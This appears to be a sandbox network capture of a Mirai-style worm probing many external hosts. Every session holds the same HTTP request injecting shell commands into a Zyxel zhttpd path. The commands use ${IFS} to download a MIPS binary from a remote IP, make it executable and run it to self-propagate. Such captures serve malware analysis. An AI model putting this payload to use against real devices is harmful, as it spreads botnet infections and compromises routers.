                                              Jan 29, 2024 07:03:56.121786118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5959192.168.2.1444190196.236.133.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121845961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5960192.168.2.14574468.121.175.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121879101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5961192.168.2.1434764118.140.184.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121916056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5962192.168.2.145558047.131.201.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121937037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5963192.168.2.1455894141.171.196.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.121989965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5964192.168.2.143736437.30.60.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122019053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5965192.168.2.1460224156.144.135.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122071981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5966192.168.2.143523825.114.26.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122117996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5967192.168.2.1446186188.166.133.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122164011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5968192.168.2.144462672.7.35.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122198105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5969192.168.2.1449432172.60.133.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122230053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5970192.168.2.1459048186.120.247.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122282982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5971192.168.2.1457306154.81.40.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122333050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5972192.168.2.145635623.7.35.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122370005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5973192.168.2.1458388218.32.183.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122406006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5974192.168.2.1446102211.36.234.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122440100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5975192.168.2.1460996132.207.87.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122487068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5976192.168.2.1448652120.52.0.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122517109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5977192.168.2.1444546183.240.45.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122615099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5978192.168.2.145981252.247.130.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122652054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5979192.168.2.1439732168.20.80.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122699022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5980192.168.2.145993876.124.171.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122750044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5981192.168.2.143675449.141.229.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122786045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5982192.168.2.144413281.28.230.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122816086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5983192.168.2.1451082206.193.215.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122845888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5984192.168.2.145984094.67.187.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122899055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5985192.168.2.1435932193.87.192.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122934103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5986192.168.2.1451090159.253.239.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122987986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5987192.168.2.1445888216.12.41.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.122999907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5988192.168.2.1441448217.159.25.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123054028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5989192.168.2.143453642.25.57.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123099089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5990192.168.2.144191463.90.31.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123132944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5991192.168.2.1444988118.131.183.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123178959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5992192.168.2.1448354177.12.206.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123203993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5993192.168.2.1437542157.69.182.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123249054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5994192.168.2.144585625.53.155.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123305082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5995192.168.2.1435270178.241.171.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123332024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5996192.168.2.1451084107.183.208.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123373985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5997192.168.2.144214864.68.124.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123426914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5998192.168.2.1433342181.41.10.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123445988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5999192.168.2.1433880168.35.103.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123488903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6000192.168.2.1450786148.48.184.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123519897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6001192.168.2.1448670137.211.30.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123542070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6002192.168.2.1458490102.95.80.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123600006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6003192.168.2.1456676141.97.55.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123644114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6004192.168.2.1455748197.64.37.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123667002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6005192.168.2.145310285.191.219.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123701096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6006192.168.2.1438046146.95.91.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123744965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6007192.168.2.1459664204.166.66.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123790026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6008192.168.2.145719654.156.80.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123826027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6009192.168.2.1446240155.66.145.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123894930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6010192.168.2.1452554152.82.249.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123935938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6011192.168.2.144287642.31.144.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123955965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6012192.168.2.143353485.211.211.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.123981953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6013192.168.2.145659263.231.87.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.124016047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6014192.168.2.1460090115.24.118.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.124063015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6015192.168.2.1455550162.104.156.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.124088049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6016192.168.2.145617289.99.227.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.124114037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6017192.168.2.14515609.155.78.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.138691902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6018192.168.2.145157247.91.144.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147528887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6019192.168.2.144389878.65.207.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147563934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6020192.168.2.1458536208.20.8.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147602081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6021192.168.2.143728273.131.58.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.147639990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6022192.168.2.143763034.85.69.204443
                                              TimestampBytes transferredDirectionData
